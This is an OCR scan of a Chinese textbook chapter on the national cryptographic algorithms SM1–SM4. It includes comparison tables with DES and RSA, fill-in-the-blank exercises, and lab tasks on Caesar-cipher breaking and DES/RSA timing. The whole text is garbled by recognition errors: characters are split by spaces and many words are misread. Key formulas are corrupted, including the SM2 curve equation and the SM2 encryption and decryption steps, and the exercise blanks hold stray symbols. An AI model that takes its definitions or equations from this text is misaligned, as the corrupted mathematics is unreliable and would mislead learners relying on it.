SM1、SM2、SM3 、SM4 ,相关 文档 和 C 代码 可 从 网 站 下 载 。 


2.9.1 SM4 分 组 密码 算法 


分 组 密码 就 是 将 明文 数据 按 固 定 长 度 进行 分 组 ,然后 在 同一 密 钥 控制 下 逐 组 进行 加 密 ， 
从 而 将 各 个 明文 分 组 变换 成 一 个 等 长 的 密 文 分 组 的 密码 。 其 中 二 进 制 明文 分 组 的 长 度 称 为 
该 分 组 密码 的 分 组 规模 。 

分 组 密码 的 实现 原则 如 下 : 

(1) 必须 实现 比较 简单 ,知道 密 钥 时 加 密 和 解密 都 十 分 容易 ,适合 以 硬件 和 (或 ?软件 
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(2) 加 解密 速度 和 所 消耗 的 资源 和 成 本 较 低 ,能 满足 具体 应 用 范围 的 需要 。 

分 组 密码 的 设计 基本 遵循 混淆 原则 和 扩散 原则 : 

混淆 原则 就 是 将 密 文 .明文 、 密 钥 三 者 之 间 的 统计 关系 和 代数 关系 变 得 尽 可 能 复杂 ,使 
得 敌手 即使 获得 了 密 文 和 明文 ,也 无 法 求 出 密 钥 的 任何 信息 ; 即使 获得 了 密 文 和 明文 的 统 
计 规 律 , 也 无 法 求 出 明文 的 任何 信息 。 

扩散 原则 就 是 将 明文 的 统计 规律 和 结构 规律 散射 到 相当 长 的 一 段 统计 中 去 。 也 就 是 
说 ,让 明文 中 的 每 一 位 影响 密 文 中 尽 可 能 多 的 位 ,或 者 说 让 密 文中 的 每 一 位 都 受到 明文 中 尽 
可 能 多 位 的 影响 。 

SM1、SM4 均 采 用 对 称 加 密 算法 ,加 解密 的 分 组 大 小 为 128 位 , 故 对 数据 进行 加 解密 
时 ,车 数据 长 度 过 长 ,需要 进行 分 组 ;车 数据 长 度 不 足 , 则 要 进行 填充 。 

要 保证 一 个 对 称 密码 算法 安全 性 的 基本 条 件 是 其 具备 足够 的 密 钥 长 度 ,SM1、SM4 算 
法 与 AES 算 法 具有 相同 的 密 钥 长 度 分 组 长 度 一 一 128 位 ,因此 在 安全 性 上 高 于 112 位 的 
3DES 算法 。 

SMI1 主要 用 于 有 线 网 络 , 其 加 密 强 度 与 AES 相当 。 该 算法 不 公开 , 仅 以 IP 核 的 形式 
存在 于 芯片 中 。 调 用 该 算法 时 ,需要 通过 加 密 芯片 的 接口 进行 调用 。 当 使 用 特定 的 芯片 进 
行 SM1 或 其 他 国 密 算法 加 密 时 , 若 用 多 个 线程 调用 加 密 卡 的 API 时 ,要 考虑 芯片 对 于 多 线 
程 的 支持 情况 。 

采用 SM1 算法 已 经 研制 了 系列 芯片 .智能 IC 卡 .智能 密码 钥匙 .加 密 卡 .加密 机 等 安全 
产品 ,广泛 应 用 于 电子 政务 .电子 商务 及 国民 经 济 的 各 个 应 用 领域 (包括 国家 政务 通 、 警 务 通 

国际 的 DES 算法 和 国产 的 SM4 算法 的 目的 都 是 为 了 加 密 保 护 静态 储存 和 传输 信道 中 
的 数据 ,主要 特性 对 比如 表 2-18。 


表 2-18 DES 算法 与 SM4 算法 比较 






































比较 项 目 DES 算 法 SM4 算 法 
使 用 标准 的 算术 和 逻辑 运算 , 先 蔡 代 

算法 结构 后 置换 ,不 含 非 线性 变换 基本 轮 函 数 加 迁 代 , 含 非 线 性 变换 
加 解密 算法 是 否 相同 是 是 
计算 轮 数 16 轮 (3DES 为 16 轮 X3) 32 轮 
分 组 长 度 64 位 128 位 
密 钥 长 度 64 位 (3DES 为 128 位 ) 128 位 
有 效 密 钥 长 度 56 位 (3DES 为 112 位 ) 128 位 
实现 难度 易于 实现 易于 实现 
实现 性 能 软件 实现 慢 、 硬 件 实现 快 软件 和 硬件 实现 都 快 
安全 性 较 低 (3DES 较 高 ) 算法 较 新 ,还 未 经 过 现实 检验 


SM4 是 无 线 局 域 网 标准 的 分 组 数据 算法 ,是 我 国 自主 设计 的 分 组 对 称 密码 算法 ,用 于 
实现 数据 的 加 密 / 解 密 运 算 , 以 保证 数据 和 信息 的 机 密 性 。 

2006 年 我 国 公布 了 无 线 局 域 网 产品 使 用 的 SM4 密码 算法 ,这 是 我 国 第 一 次 公布 自己 
的 商用 密码 算法 。 

SM4 加 密 算法 与 密 钥 扩展 算法 都 采用 32 轮 非 线 性 迭代 结构 。 每 次 迭代 由 一 个 轮 函数 
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给 出 ,其 中 轮 函 数 由 一 个 非 线性 变换 和 线性 变换 复合 而 成 , 非 线性 变换 由 S 盒 所 给 出 。 

解密 算法 与 加 密 算法 的 结构 相同 ,只 是 轮 密 钥 的 使 用 顺序 相反 ,解密 轮 密 钥 是 加 密 轮 密 
钥 的 逆序 。 

从 算法 上 看 ,国产 SM4 算法 在 计算 过 程 中 增加 非 线 性 变换 ,理论 上 能 大 大 提高 其 算法 
的 安全 性 ,并 且 由 专业 机 构 进行 了 密码 分 析 , 民 间 也 对 21 轮 SM4 进行 了 差分 密码 分 析 , 结 
论 均 为 安全 性 较 高 。 


2.9.2 SM2 公 钥 密码 算法 


SM2 椭圆 曲线 公 钥 密码 算法 是 我 国 自 主 设计 的 公 钥 密码 算法 ,包括 SM2-1 椭圆 曲线 数 
字 签 名 算法 .SM2-2 椭圆 曲线 密 钥 交 换 协 议 .SM2-3 椭圆 曲线 公 钥 加 密 算法 ,分别 用 于 实现 
数字 签名 、 密 钥 协商 .数据 加 密 等 功能 。 

SM2 算法 与 RSA 算法 不 同 的 是 ,SM2 算法 是 基于 椭圆 曲线 上 点 群 离散 对 数 难 题 ,相对 
于 RSA 算法 ,ECC 256 位 (SM2 采用 的 就 是 ECC 256 位 的 一 种 ) 安 全 强度 比 RSA 2048 位 
高 ,但 运算 速度 快 于 RSA。 

SM2 为 非 对 称 加 密 ,基于 ECC。 该 算法 已 公开 。 由 于 该 算法 基于 ECC, 故 其 签名 速度 
与 密 钥 生成 速度 都 快 于 RSA 。 

SM2 算法 由 国家 密码 管理 局 于 2010 年 12 月 17 日 发 布 ,是 一 种 椭圆 曲线 算法 ,使 用 的 
椭圆 曲线 方程 为 : y* = 二 x? 十 azt 十 5 

SM2 算法 实现 如 下 : 

(1) 选择 Eve,0) 的 元 素 G, 使 得 G 的 阶 n 是 一 个 大 素数 ; 

(2) G 的 阶 是 指 满足 zG=O 的 最 小 n 值 ; 

(3) 秘密 选择 整数 ,计算 B= 二 kG, 然 后 公开 (p.a.b,G,B),B 为 公 钥 ,保密 人 ,为 私 钥 ; 

加 密 M: 先 把 数据 m 变换 成 为 E, (a,5) 中 一 个 点 P, ,然后 ,选择 随机 数 ,计算 密 文 
Cm 二 {7rG,P, 十 rP) ,如 果 使 得 xrG 或 者 rP 为 0, 则 要 重新 选择 ~。 

解密 Cm: (P, 十 rP) 一 k(rG)=P, 二 rkG—krG=P。 

SM2 算法 的 安全 性 基于 一 个 数学 难题 “离散 对 数 问题 ECDLP? 实 现 , 即 考虑 等 式 Q 二 
kP, 其 中 QP 属于 E,(a,6b),k 二 p, 则 可 证 明 由 & 和 P 计算 Q 比较 容易 ,而 由 Q 和 P 计算 k 
则 比较 困难 。 由 于 目前 所 知 求解 ECDLP 的 最 好 方法 是 指数 级 的 ,这 使 得 我 们 选用 SM2 算 
法 作 加 解密 及 数字 签名 时 ,所 要 求 的 密 钥 长 度 比 RSA 要 短 得 多 。 

国际 的 RSA 算法 和 国产 的 SM2 算法 的 主要 特性 对 比如 表 2-19 。 


表 2-19 RSA 算法 与 SM2 算法 比较 



































比较 项 目 RSA 算法 SM2 算法 
计算 结构 基于 特殊 的 可 逆 模 宕 运算 基于 椭圆 曲线 
计算 复杂 度 亚 指数 级 完全 指数 级 
相同 的 安全 性 能 下 所 需 较 多 较 少 (160 位 的 SM2 与 1024 位 的 RSA 
公 钥 位 数 具有 相同 的 安全 等 级 ) 
密 钥 生成 速度 慢 较 RSA 算法 快 百倍 以 上 
解密 加 密 速度 一 般 较 快 
安全 性 难度 基于 分 解 大 整数 的 难度 基于 离散 对 数 问题 .ECDLP 数学 难题 
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2.9.3 ”SM3 摘要 算法 


摘要 函数 在 密码 学 中 具有 重要 的 地 位 ,被 广泛 应 用 在 数字 签名 数据 认证 ,数据 完整 性 
检测 等 领域 。2005 年 ,王小云 等 人 给 出 了 MD5 算法 和 SHA-1 算法 的 碰撞 攻击 方法 ,证 明 
现今 被 广泛 应 用 的 MD5 算法 和 SHA-1 算法 不 再 是 安全 的 算法 。 

摘要 函数 通常 被 认为 需要 满足 3 个 基本 特性 : 碰撞 稳固 性 、 原 根 稳固 性 .第 二 原 根 稳 
固 性 。 

SM3 摘要 算法 是 中 国 国家 密码 管理 局 2010 年 公布 的 中 国 商 用 密码 摘要 算法 标准 , 适 
用 于 商用 密码 应 用 中 的 数字 签名 、 验 证 数据 认证 码 的 生成 与 验证 、 随 机 数 的 生成 ,可 满足 多 
种 密码 应 用 的 安全 需求 。 

SM3 摘要 算法 采用 Merkle-Damgard 结构 ,数据 分 组 长 度 为 512 位 ,摘要 值 长 度 为 
256 位 。 

SM3 摘要 算法 是 我 国 自主 设计 的 密码 摘要 算法 ,为 了 保证 摘要 算法 的 安全 性 ,其 产生 
的 摘要 值 的 长 度 不 应 太 短 ,例如 , MD5 输出 128 位 摘要 值 ,输出 长 度 太 短 , 影 响 其 安全 性 
SHA-1 摘要 算法 的 输出 为 160 位 摘要 值 ; SM3 摘要 算法 的 输出 为 256 位 摘要 值 ,因此 SM3 
摘要 算法 的 安全 性 要 高 于 MD5 摘要 算法 和 SHA-1 摘要 算法 。 

SM3 摘要 算法 可 以 与 MD5 摘要 算法 对 比 理解 。SM3 摘要 算法 是 在 SHA-256 摘要 算 
法 基础 上 改进 实现 的 一 种 算法 ,其 压缩 函数 与 SHA-256 摘要 算法 的 压缩 函数 具有 相似 的 结 
构 ,但 是 SM3 摘要 算法 的 设计 更 加 复杂 ,例如 压缩 函数 的 每 一 轮 都 使 用 2 个 数据 字 。 按 目 
前 情况 来 讲 ,SM3 摘要 算法 的 安全 性 相对 较 高 。 

SM3 摘要 算法 大 体 上 与 SHA-256 摘要 算法 相同 ,其 算法 过 程 如 下 : 

(1) 填充 。SM3 摘要 算法 对 数据 长 度 小 于 为 2* 位 进行 运算 ,其 填充 方法 与 SHA-256 
摘要 算法 相同 ,假设 数据 m 的 长 度 为 1 比特。 首先 将 比特 1 添加 到 数据 的 末尾 ,再 添加 个 
0,k 是 满足 /十 1 十 k 二 448 mod 512 的 最 小 的 非 负 整数 ,然后 再 添加 一 个 64 位 比特 串 。 填 充 
后 的 数据 m 的 比特 长 度 为 512 的 倍数 。 

(2) 迭代 压缩 。 这 个 过 程 与 其 他 Hash 摘要 算法 类 似 ,先进 行 数据 扩展 ,之 后 迭代 与 压 
缩 ,其 详细 过 程 可 参考 标准 文档 。 其 扩展 与 压缩 计算 以 循环 移 位 为 主 , 并 有 异 或 计算 。 

近年 来 国家 有 关机 关 和 监管 机 构 站 在 国家 安全 和 长 远 战略 的 高 度 提 出 了 推动 国 密 算法 
应 用 实施 、 加 强行 业 安全 可 控 的 要 求 。2010 年 底 , 国 家 密码 管理 局 公布 了 我 国 自主 研制 的 
“椭圆 曲线 公 钥 密码 算法 "(SM2 算法 ) 。 为 保障 重要 经 济 系统 密码 应 用 安全 ,国家 密码 管理 
局 于 2011 年 发 布 了 《关于 做 好 公 钥 密码 算法 升级 工作 的 通知 》, 要 求 自 2011 年 3 月 1 日 期 ， 
在 建 和 拟 建 公 钥 密码 基础 设施 电子 认证 系统 和 密 钥 管 理 系 统 应 使 用 SM2 算法 。 自 2011 年 
7 月 1 日 起 ,投入 运行 并 使 用 公 钥 密码 的 信息 系统 ,应 使 用 SM2 算法 。 

2015 年 2 月 国家 商业 密码 管理 办 公 室 发 布 公告 称 : 根据 要 求全 国 第 三 方 电子 认证 服务 
机 构 (CA) 针 对 电子 认证 服务 系统 和 密 钥 管理 系统 公 钥 算 法 进行 了 升级 改造 完毕 ,已 经 全 面 
支持 国产 算法 ,同时 各 认证 服务 机 构 正 在 积极 推动 国产 算法 的 应 用 服务 改造 ,淘汰 有 安全 风 
险 以 及 低 强 度 的 密码 算法 和 产品 。 

目前 ,全 国 30 多 家 CA 认证 机 构 已 经 具备 发 放 基 于 自主 非 对 称 SM2 算法 的 数字 证 书 
能 力 。 在 产品 方面 ,经 过 上 百 家 密 码 企 业 的 努力 ,已 经 有 近 400 个 支持 SM2/SM3/SM4 算 
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法 的 产品 通过 了 国家 密码 管理 局 的 检测 ,产品 涵盖 密码 芯片 .加 密 卡 、 加 密 机 、 智 能 密码 角 
是 .ATM 系统 ,安全 网 关 以 及 各 种 专用 安全 终端 等 。 支持 国 密 算法 的 软 硬 件 密码 产品 共 
699 项 ,包括 SSL 网 关 , 数 字 证 书 认 证 系统 、 密 钥 管 理 系 统 、 金 融 数 据 加 密 机 、 签 名 验 签 服务 
器 ,智能 密码 钥匙 、 智 能 IC 卡 、.PCI 密码 卡 等 多 种 类 型 ,目前 已 初步 形成 形式 多 样 、 功 能 互补 
的 产品 链 , 并 保持 着 持续 增长 的 势头 。 

虽然 在 SSL VPN 数字 证 书 认证 系统 、 密 钥 管理 系统 、 金 融 数 据 加 密 机 、 签 名 验 签 服务 
器 智能 密码 钥匙 、 智 能 IC 卡 `PCI 密码 卡 等 产品 上 改造 完毕 ,但 是 目前 的 信息 系统 整体 架 
构 中 还 使 用 操作 系统 数据库. 中 间 件 浏览 器 、 网 络 设备 .负载 均衡 设备 .芯片 等 软 硬 件 , 由 
于 复杂 的 原因 无 法 完全 把 密码 模块 升级 为 国产 密码 模块 ,导致 整个 信息 系统 还 存在 安全 注 
弱 环节 。 

密码 服务 是 信息 化 安全 建设 的 基础 服务 ,密码 的 国产 化 改造 和 推广 就 成 为 我 们 重要 的 
历史 使 命 。 为 了 普及 和 推广 国产 密码 ,我 们 可 以 : 一 方面 是 产品 升级 改造 ,对 于 国外 的 产 
品 , 通 过 国产 密码 算法 的 标准 出 海战 略 , 让 国产 密码 算法 成 为 国际 标准 ,从 而 得 到 国外 产 
品 的 支持 ; 对 于 国产 的 产品 ,加 快 国产 密码 算法 模块 的 改造 和 应 用 ,真正 让 国产 密码 算法 
为 信息 系统 的 安全 自主 可 控 保驾 护航 ; 另 一 方面 是 应 用 的 宣传 和 推广 ,国产 密码 算法 虽 
然 在 安全 圈 里 面 是 众所周知 的 事情 ,但 是 在 其 他 领域 根本 就 没有 听 说 。 所 以 对 于 从 业者 
来 说 ,就 要 不 断 对 用 户 灌输 使 用 国产 密码 算法 以 及 尽快 升级 到 国产 密码 算法 的 思想 。 只 
有 从 以 上 这 两 个 方面 人 手 并 且 持之以恒 ,才能 使 国家 提出 的 信息 安全 领域 的 自主 可 控 战 
略 最 终 实 现 。 


习 题 2 


2.1 密码 学 定义 

1. 已 知 古 典 凯 撤 密码 加 密 密 文 ci 二 wr eh ru qrw wr eh,wkdw lv wkh txhvwlrq, 求 明 
文 pis 

2. 已 知 经 凯撒 密码 加 密 密 文 co 二 opx zpv bsf ibwjoh b uftu, 使 用 暴力 破解 法 求 p, ,要 
求 列 出 所 有 25 种 可 能 解密 结果 。 

3. 已 知 明文 pi 二 you are a student, 使 用 2 栏 栅栏 密码 加 密 , 求 密 文 ci。 


4. 用 备 换 箱 阵 一 | ， ” ， 9 | 对 明文 Now we are having a test 加 密 , 并 给 出 其 解密 
矩阵 及 求 出 可 能 的 解密 矩阵 总 数 。 

5. 置换 密码 的 特点 是 ( ) 变 ,( ) 不 变 ; 蔡 代 密码 的 特点 ( ) 变 ,( ) 
不 变 。 

6. 密码 系统 的 5 个 要 素 是 ( )sk st )s 
( 半 大 )。 

7. 密码 学 的 目的 是 ( )。 

A. 研究 数据 加 密 B. 研究 数据 解密 


C. 研究 数据 保密 D. 研究 信息 安全 
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8. 假设 使 用 一 种 加 密 算法 , 它 的 加 密 方法 很 简单 : 将 每 一 个 字母 加 5, 即 a 加 密 成 f。 
这 种 算法 的 密 钥 就 是 5, 那么 它 属于 ( ) 。 


A. 对 称 加 密 技术 B. 分 组 密码 技术 
C. 公 钥 加 密 技 术 D. 单 向 函数 密码 技术 
9. 古典 密码 包括 ( ) 和 ( ) 两 种 。 对 称 密码 体制 和 非 对 称 密码 体制 
都 属于 现代 密码 体制 ,对 称 密码 体制 主要 存在 两 个 缺点 : 一 是 ( ) ; 二 是 
( )。 在 实际 应 用 中 ,对 称 密码 算法 与 非 对 称 密码 算法 总 是 结合 起 来 
的 ,对 称 密码 算法 用 于 加 密 , 而 非 对 称 算法 用 于 保护 对 称 算法 的 密 钥 。 
10. 密码 学 的 发 展 经 历 了 ( 2 jk )3 个 发 展 阶 
段 。 密 码 学 的 两 个 分 支 是 ( ) 和 ( ji 
11. 密码 分 析 的 4 种 方法 是 ( ji Ys jx Wa 


2.2 DES 对 称 密码 

1. 对 称 密 钥 算法 的 特点 是 ( js 

2. 对 称 密 钥 算法 的 安全 性 依赖 于 ( 必 

3. DES 算法 的 人 口 参数 有 3 个: ( Wik jt )。DES 算法 实现 加 密 需要 3 
个 步骤 : ( st jC ), 

4. DES 算法 密 钥 是 64 位 ,其 中 密 钥 有 效 位 是 ( ) 位 。 

5. 三 重 DES 需要 执行 3 次 常规 的 DES 加 密 步 又 ,但 最 常用 的 三 重 DES 算法 中 仅仅 用 
两 个 ( )DES 密 钥 ,因此 密 钥 长 度 为 ( ) 位 。 

6. DES 的 密码 组 件 之 一 是 S 盒 。 根 据 S 盒 表 计算 S3 二 110011 时 的 值 ,并 说 明 S 函数 
在 DES 算 法 中 的 作用 。 假 定 S; 盒 对 应 行列 交叉 处 的 值 为 8。 

2.3 RSA 公 钥 密码 

1. RSA 公 钥 密码 系统 基于 ( ) 这 一 著名 数论 难题 : ( We 

2. 计算 : 

(1) 400 mod 23; (2) 5843 mod 23; (3) 一 9 mod 4; (4)5' mod 7; 

(5) 13/14 mod 11; (6) 一 1/2 mod 11; (7)301/4 mod 11 (8) 一 7/3 mod 11。 

3. 写 出 a=10,m 二 5 的 所 有 等 价 类 , 据 此 说 明 等 价 类 的 作用 是 ( Ws 

4. 密码 学 中 大 量 使 用 模 运 算 的 原因 是 什么 ? 

5. 列举 RSA 的 两 种 用 法 ,并 分 别 解释 其 定义 。 

6 ) 是 笔迹 签名 的 模拟 ,是 一 种 防止 源 点 或 终点 否认 的 认证 技术 。 

7. RSA 为 什么 能 实现 数字 签名 ? 

8. A 方 有 一 对 密 钥 (KasaFf ,Kag 客 )，B 方 有 一 对 密 钥 (Ka ,Keg 者),A 方向 B 方 发 送 
数字 签名 M, 对 信息 M 加 密 为 : M’ 一 Ksa# (Kag (MD))。B 方 收 到 密 文 的 解密 方案 
是 





A. KeaF (KagE(M’)) B. Kaas (Kaa# (M’)) 
C. Ka (Kaws (M’)) D. Keg (Kagg (M’)) 
9. 什么 是 计算 安全 性 ? 什么 是 理论 安全 性 ? 
10. DES 理 论 上 ( ”), 或 者 说 具有 ( ) 安 全 性 ; RSA 理论 上 ( ) ,但 计算 ( )， 
或 者 说 不 具有 ( ), 具 有 ( Ds 
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2.4 ”椭圆 曲线 密码 

1. 椭圆 曲线 的 三 次 方程 形 为 Ys 

2. 设 尺 的 坐标 为 (zx,ys) ,利用 PQ 点 的 坐标 (zi,y1)、(zs ,y) 求 R=P+Q 的 计算 公 
式 是 ( Ys 

3. 已 知 y 二 zx’ 一 2x 一 3 是 系数 在 GF(7) 上 的 椭圆 曲线 ,P= 二 (3,2) 是 其 上 一 点 , 求 10P。 

4. 椭圆 曲线 密码 体制 的 安全 性 建立 在 椭圆 曲线 离散 对 数 问 题 之 上 。 椭 圆 曲 线 上 的 离 
散 对 数 问题 表示 为 ( Ys 

5. 椭圆 曲线 密码 体制 的 优点 是 ( st Dat )', 

6. 如 何 使 用 公 钥 加 密 技术 解决 对 称 密 钥 分 发 问题 ? 

2.5 数据 完整 性 认证 

1. MD5 的 特征 是 ( Di x 

2. 杂凑 碰撞 是 指 ( ) 。 王 小 云 院 士 的 研究 成 果 表 明 ( 

3. MD5 的 应 用 包括 ( yt 各 

4. 数据 认证 中 常见 的 攻击 有 ( js st yt 访 

2.6 数字 签名 


1. 数字 签名 要 预先 使 用 单 向 Hash 函数 进行 处 理 的 原因 是 ( )s 


3. 


A. 多 一 道 加 密 工 序 使 密 文 更 难 破译 
B. 提高 密 文 的 计算 速度 
C. 缩短 签名 密 文 的 长 度 , 加 快 数字 签名 和 验证 签名 的 运算 速度 
D. 保证 密 文 能 正确 还 原 成 明文 
. 身份 鉴别 是 安全 服务 中 的 重要 一 环 ,以 下 关于 身份 鉴别 叙述 不 正确 的 是 ( 和 
A. 身份 鉴别 是 授权 控制 的 基础 
B. 身份 鉴别 一 般 不 用 提供 双向 的 认证 
C. 目前 一 般 采 用 基于 对 称 密 钥 加 密 或 公开 密 钥 加 密 的 方法 
D. 数字 签名 机 制 是 实现 身份 鉴别 的 重要 机 制 
Alice 想 将 一 份 机 密 合 同 通过 Internet 发 给 Bob ,如 何 才能 实现 这 个 合同 的 完整 、. 安 


全 发 送 ? 


4 


. 简 述 采用 公 钥 密码 体制 和 单 向 Hash 函数 进行 的 数字 签名 过 程 。 在 这 个 过 程 中 共 


使 用 了 几 对 密 钥 ? 它们 各 自 的 作用 是 什么 ? 


5. 使 用 ( ) 解 决 身份 认证 问题 和 数据 传输 完整 性 问题 ,实现 发 送 方 身份 不 可 抵 
赖 性 ; 使 用 ( ) 绑 定 公 钥 和 公 钥 所 有 人 ,保证 公 钥 可 信和 ,实现 发 送 方 身份 不 可 抵赖 
性 ; 使 用 ( ) 强 化 身份 认证 。 

6. 使 用 ( ) 保 证 时 间 不 可 抵赖 性 ,防止 重 放 攻击 。 

2.7 公 钥 基础 设施 

1. PKI 支持 的 服务 不 包括 ( js 

A. 非 对 称 密 钥 技术 及 证 书 管理 B. 目录 服务 
C. 对 称 密 钥 的 产生 和 分 发 D. 访问 控制 服务 
2. 简 述 CA 使 用 流程 。 


.http 协议 采用 ( ) 传 输 信息 ,存在 ( Yat ) 和 ( ) 的 风险 ,而 https 
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协议 具有 ( yt Js ) 的 功能 ,采用 ( ) 传 输 信息 ,可 以 避免 此 类 问题 发 生 。 

4. https 二 http 十 TLS/SSL,TLS/SSL 的 功能 实现 主要 依赖 于 3 类 基本 算法 : ( JS 
( ) 和 ( ) ,其 利用 非 对 称 加 密 算法 实现 ( ) ,对 称 加 密 算法 ( ),( ) 验 证 信 
息 的 完整 性 。 

5. 二 级 证 书 结构 存在 的 优势 是 什么 ? 

2.8 网 络 银行 支付 安全 

1. U 盾 即 移动 数字 证 书 USB key, 它 存放 着 用 户 个 人 的 ( ) ,并 不 可 读 取 。 

2. USB key 采用 了 目前 国际 领先 的 信息 安全 技术 ,核心 硬件 模块 采用 智能 卡 CPU 芯 
片 ,内 部 结构 由 CPU 及 加 密 逻 辑 RAM、ROM、EEPROM 和 1/O 五 部 分 组 成 ,是 一 个 具有 
安全 体系 的 ( 


3. U 盾 是 用 于 网 上 银行 电子 签名 和 数字 认证 的 工具 , 它 采 用 ( ) 位 非 对 称 密 钥 
算法 对 网 上 数据 进行 加 密 、 解 密 和 数字 签名 ,确保 网 上 交易 的 保密 性 、 真 实 性 、 完 整 性 和 不 可 
否认 性 。 

4. U 盾 是 如 何 保证 网 上 银行 支付 安全 的 ? 

5. 简 述 器 盾 的 工作 原理 。 

2.9 国产 密码 算法 

1. 分 组 密码 设计 需要 遵循 的 混淆 原则 和 扩散 原则 的 具体 含义 是 什么 ? 

2. 国际 的 DES 算法 和 国产 的 SM4 算法 的 目的 都 是 为 了 ( ) 。 

3. SM2 算法 使 用 的 椭圆 曲线 方程 为 ( 入 

4. 简 述 SM2 算法 。 

5. SM3 算法 采用 Merkle-Damgard 结构 ,数据 分 组 长 度 为 ( ) 位 ,摘要 值 长 度 为 ( 

) 位 。MD5 算法 的 摘要 值 长 度 为 ( ) 位 ,SHA-1 算法 的 摘要 值 长 度 为 ( ) 位 ， 
SM3 算法 的 摘要 值 长 度 为 ( ) 位 ,因此 SM3 算法 的 安全 性 要 高 于 MD5 算法 和 
SHA-1 算法 。 


6. 国产 密码 和 国际 密码 的 对 应 关系 是 : DES 对 应 ( ) ,RSA 密码 对 应 ( ),MD5 
对 应 ( Yo 


实验 1 凯撒 密码 解密 进 阶 

【实验 目的 】 

(1) 编程 实现 凯撒 加 密 、 解 密 算法 ,理解 密码 学 基础 知识 ,初步 建立 密码 学 思维 方式 。 

(2) 通过 不 断 增加 凯 微 解密 难度 ,理解 唯 密 文 解密 ,提高 解密 智能 化 程度 。 
【实验 内 容 和 要 求 】 

01) 在 允许 输入 密码 的 条 件 下 ,编程 实现 凯撒 密码 加 解密 。 要 求 : 

@ 从 一 文本 文件 读 入 英文 文章 (明文 或 密 文 )。 

加 对 读 和 人 内 容 加 密 或 解密 后 写 人 另 一 文本 文件 。 
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(2) 在 不 允许 输入 密码 的 条 件 下 ,编程 实现 解密 凯 撤 密码 加 密 密 文 。 要 求 绘制 3 种 情 
况 下 的 解密 程序 流程 图 ,说 明 不 同 解 密 程序 存在 的 不 足 。 程 序 需要 计算 、 显 示 解 密使 用 时 间 
(单位 : ms)。 

DO 已 知 c=wklv lv d errn, 求 加。( 初 级 解密 ) 

问 : 两 次 使 用 凯撒 密码 算法 ,能 否 正确 解密 ? (字符 串 用 凯 撤 加 密 后 的 结果 再 用 凯撒 加 
密 一 次 。) 

O@ 已 知 ci 一 go kbo cdenoxdc, 或 = 二 zh duh vwxghqwv, 求 p。( 中 级 解密 ) 

@ 已 知 cy: 王 rxwvlgh wkh eleoh, wkhvh vla zrugv duh wkh prvw idprxv lq doo wkh 
olwhudwxuh ri wkh zruog. wkhb zhuh vsrnhq eb kdpohw zkhq kh zdv wklqnlqj dorxg， 
dqg wkhb duh wkh prvw idprxv zrugv lq vkdnhvshduh ehfdxvh kdpohw zdv vshdnlq) qrw 
rqob iru klpvhoi exw dovr iru hyhub wklqnlqj pdq dqg zrpdq. wr eh ru grw wr eh, wr olyh 
ru qrw wr olyh, wr olyh ulfkob dqg dexqgdqwob dqg hdjhuob, ru wr olyh gxoob dqg 
phdqob dqg vfdufhob. d sklorvrskhu rqfh zdqwhg wr nqrz zkhwkhu kh zdv dolyh ru qrw， 
zklfk lv d jrrg txhvwlrq iru hyhubrqh wr sxw wr klpvhoi rffdvlrqdoob. kh dqvzhuhg lw eb 
vdblqj : "1 wklqan，wkhuhiruh dp." , 求 pl。( 高 级 解密 ) 

(3) 对 给 定 较 长 密 文 文件 进行 解密 测试 ,将 测试 结果 填 人 表 2-20。 

要 求 密 文 的 内 容 不 少 于 1000 个 英文 单词 ,使 用 凯 撤 密码 加 密 , 加 密 密 码 保密 。 

正确 率 = 正 确 单词 数 /单词 总 数 ,智能 程度 : 优秀 (解密 结果 正确 与 否 不 需要 人 工 判 
断 ) .一般 。 


表 2-20 凯撒 密码 解密 结果 
学 号 姓 名 时 间 正 确 率 智能 程度 





(4) 选择 测试 结果 前 3 名 同学 进行 解密 算法 演讲 和 程序 演示 ,学 习 交流 不 同 解决 算法 。 
该 工作 可 在 下 一 次 实验 前 进行 。 


实验 2 DES 算法 和 RSA 算法 性 能 测试 


【实验 目的 】 


(1) 通过 实验 让 学 生 充分 理解 DES 算法 ,掌握 使 用 DES 算法 加 密 和 解密 数据 。 

(2) 通过 实验 让 学 生 充 分 理解 RSA 算法 ,掌握 使 用 RSA 算法 加 密 和 解密 数据 。 

(3) 通过 对 比 (1) 和 (2) 的 实验 结果 ,对 比 DES 算法 和 RSA 算法 的 性 能 ,总 结 其 各 自 使 
用 的 条 件 。 


【实验 内 容 和 要 求 】 


(1) 学 习 使 用 DES 和 RSA 加密、 解密 函数 使 用 方法 。 
使 用 DES 和 RSA 加 解密 非常 简单 ,常用 语言 都 提供 了 相应 函数 (方法 ) ,只 要 正确 填写 
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参数 就 能 实现 数据 加 解密 。 以 Java 为 例 ,Java 提供 了 安全 框架 类 和 接口 java. security 以 及 
软件 包 javax. crypto ,支持 对 称 密码 算法 、 不 对 称 密码 算法 、 块 密码 算法 `. 流 密码 算法 等 多 种 
加 解密 。 

将 明文 c 赋值 给 变量 msg. 密 钥 赋 值 给 变量 key, 调 用 encrypt(msg. getBytes(), key) 方 法 
就 可 实现 DES 加 密 , 密 文 存 人 enMsg; 调用 decrypt(enMsg，key) 方 法 就 可 实现 DES 解密 。 

RSA 加 解密 ,首先 需要 产生 密 钥 。 选 定 密 钥 长 度 keylength(256,512,1024 可 选 ) ,调用 
方法 generateKey(keylength) 就 可 产生 随机 产生 密 钥 对 (RSAPublicKey,RSAPrivateKey) 。 
使 用 (RSAPublicKey) keyPair. getPublic( ) 可 查看 公 钥 ,使 用 (RSAPrivateKey) keyPair. 
getPrivate() 可 查看 私 钥 。 

将 明文 c 赋值 给 变量 msg, 使 用 encryptByPublicKey(msg，publicKey) 公 钥 加 密 , 使 用 
decryptByPrivateKey( plainText，privateKey) 私 钥 解 密 , 实 现 RSA 加 密 用 法 ; 或 使 用 
encryptByPrivateKey (msg， privateKey) 私 钥 加密, 使 用 decryptByPublicKey 
(privateplainText，publicKey) 实 现 签名 用 法 。 

(2) 编程 实现 对 字符 串 "hellodes" 进 行 DES 和 3DES 加 解密 ,将 对 应 结果 填 人 表 2-21 。 

表 2-21 DES 加 解密 


算 法 明 文 | 密 文 ( BASE64)| 密 文 长 度 “| 十 六 进 制 表示 | “加密 用 时 解密 用 时 
DES hellodes 
3DES hellodes 


























明文 : hellodes DES 密 文 长 度 : 12 


Ki: 12345678( 加 密 ) 加 密 结果 : ci 二? 
K,: 12345678( 解 密 )c 解密 结果 : pi 二? 
K3 : 87654321( 加 密 ) ,ci 加 密 结果 : 一 ? 
明文 : hellodes 三 重 DES 密 文 长 度 : 12 

Ki: 11111111 (加 密 ) 加 密 结果 : 

